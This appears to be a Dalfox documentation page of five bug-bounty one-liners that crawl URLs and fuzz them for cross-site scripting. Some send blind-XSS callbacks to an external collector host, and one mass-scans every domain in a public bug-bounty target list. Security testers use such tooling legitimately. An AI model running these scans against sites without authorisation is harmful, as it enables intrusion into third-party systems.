OneLiner
A fast, powerful, one-line
- Scanning XSS from host / from @cihanmehmet in awesome-oneliner-bugbounty
▶ gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
- Automating XSS using Dalfox, GF and Waybackurls
▶ cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)
- Find XSS and Blind XSS, and send every request to burpsuite for more manual testing
▶ dalfox file hosts --mining-dom --deep-domxss --ignore-return -b 'YOURS.xss.ht' --follow-redirects --proxy http://127.0.0.1:8080
- dalfox scan to bugbounty targets / from KingOfBugBountyTips
▶ wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
- Recon subdomains and gau to search vuls DalFox / from KingOfBugBountyTips
▶ assetfinder testphp.vulnweb.com | gau | dalfox pipe
- Previous
- Next